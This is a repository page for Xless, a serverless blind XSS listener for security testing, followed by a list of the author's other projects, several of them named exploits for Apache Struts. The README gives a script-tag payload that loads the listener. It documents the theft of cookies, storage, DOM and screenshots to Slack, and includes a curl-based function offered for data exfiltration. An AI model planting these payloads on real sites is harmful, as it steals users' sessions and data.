• Stars
    star
    316
  • Rank 132,587 (Top 3 %)
  • Language
    JavaScript
  • Created almost 6 years ago
  • Updated about 1 year ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

The Serverless Blind XSS App


Xless
xless

The Serverless Blind XSS App

Maintained Issues Last Commit

ℹī¸ About The Project

Xless is a serverless Blind XSS (bXSS) application that can be used to identify Blind XSS vulnerabilities using your own deployed version of the application. There is no need to run a full deployment process; just setup a vercel.com account and run bash deploy.sh. That's it. You now have a fully-running Blind XSS listener that uses Slack to notify you for callbacks.

⚠ī¸ Requirements

  • vercel.com account: Vercel provides a free plan for serverless. If you use another provider for serverless, code changes should be minimal.
  • Slack Incoming Webhook URL.
  • IMGBB (free) Account and API key - for the screenshots.

🚀 Deployment

  1. Run bash deploy.sh
$ bash deploy.sh

> Deploying ~/xless under X
> https://custom-xless-deployment.vercel.app [v2] [in clipboard] [4s]
> Success! Deployment ready [4s]
  1. Use the URL for blind XSS testing đŸ”Ĩ

Xless will automatically serve the XSS payload, collect information, and exfiltrate it into your serverless app, which is then sent right to you in Slack.

đŸ’Ŧ Example Payload

<script src="https://custom-xless-deployment.vercel.app"></script>

👀 Demo

Demo

📨 Collected Data

  • Cookies
  • User-Agent
  • HTTP Referrer
  • Browser DOM
  • Browser Time
  • Document Location
  • Origin
  • LocalStorage
  • SessionStorage
  • IP Address
  • Screenshot

📡 Out-of-Band (OOB) Callbacks Listener

Xless also works as an OOB (Out-of-Band) callbacks listener for HTTP/HTTPS requests. Any HTTP GET request that is sent to non-parent path will be alerted.

👀 Demo

$ curl https://custom-xless-deployment.vercel.app/callback-canary

OOB CallBack Listener Demo

Or anything random, such as:

$ curl https://custom-xless-deployment.vercel.app/88bf0ecd

👨‍⚕ī¸ Health Check

Xless provides a /health endpoint to let you know that everything is configured correctly. The current tests are the existance of the API keys and a successful image upload to IMGBB.

Example Blind XSS payloads

You can view a number of handy XSS payloads for your xless app at $URL/examples

  • URL: https://custom-xless-deployment.vercel.app/examples Once you deploy your app, you can find the examples there.

📩 Scriptable Messages

You can use Xless to send direct messages to your listener. It can be useful in data exfiltration or as a scriptable way to send messages and alerts to your Slack app.

# on your (bashrc / zshrch) file:
function xless() {
  curl -s https://custom-xless-deployment.vercel.app/message --data "text=$1"
}

Contribution

Contribution is very welcome. Please share your ideas by Github issues and pull requests.

Here are some ideas to start with:

  1. Enabling sharing of page screenshot.
  2. Scriptable message.
  3. Your idea of a new feature?

Acknowledgement

Awesome Similar Projects

Legal Disclaimer

This project is made for educational and ethical testing purposes only. Usage of xless for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.

License

The project is currently licensed under MIT License.

Author

Mazin Ahmed

More Repositories

1

secrets-patterns-db

Secrets Patterns DB: The largest open-source Database for detecting secrets, API keys, passwords, tokens, and more.
Python
865
star
2

bfac

BFAC (Backup File Artifacts Checker): An automated tool that checks for backup artifacts that may disclose the web-application's source code.
Python
513
star
3

Firefox-Security-Toolkit

A tool that transforms Firefox browsers into a penetration testing suite
Shell
473
star
4

shennina

Automating Host Exploitation with AI
Python
433
star
5

struts-pwn

An exploit for Apache Struts CVE-2017-5638
Python
417
star
6

server-status_PWN

A script that monitors and extracts requested URLs and clients connected to the service by exploiting publicly accessible Apache server-status instances.
Python
407
star
7

GithubCloner

A script that clones Github repositories of users and organizations.
Python
381
star
8

tfquery

tfquery: Run SQL queries on your Terraform infrastructure. Query resources and analyze its configuration using a SQL-powered framework.
Python
324
star
9

struts-pwn_CVE-2018-11776

An exploit for Apache Struts CVE-2018-11776
Python
299
star
10

jwt-pwn

Security Testing Scripts for JWT
Python
288
star
11

struts-pwn_CVE-2017-9805

An exploit for Apache Struts CVE-2017-9805
Python
247
star
12

public

PHP
36
star
13

go-random

🌐 go-random: A fast, clear, and cryptographically-secure random data generator for Golang
Go
27
star
14

whatsapp-chat-parser

WhatsApp Chat Parser
Python
17
star
15

Ubuntu-Desktop-Malware-Vector-Demo

Demo for http://blog.mazinahmed.net/2017/04/using-ubuntu-desktop-as-malware-vector.html
5
star
16

gronpy

Print JSON objects in a "Greppable" output.
Python
4
star
17

trufflehog-clone

Trufflehog v2 Clone
2
star
18

juice-shop

TypeScript
2
star
19

mazinahmed.net

mazinahmed.net
HTML
2
star
20

detect_passive_secrets

JavaScript
1
star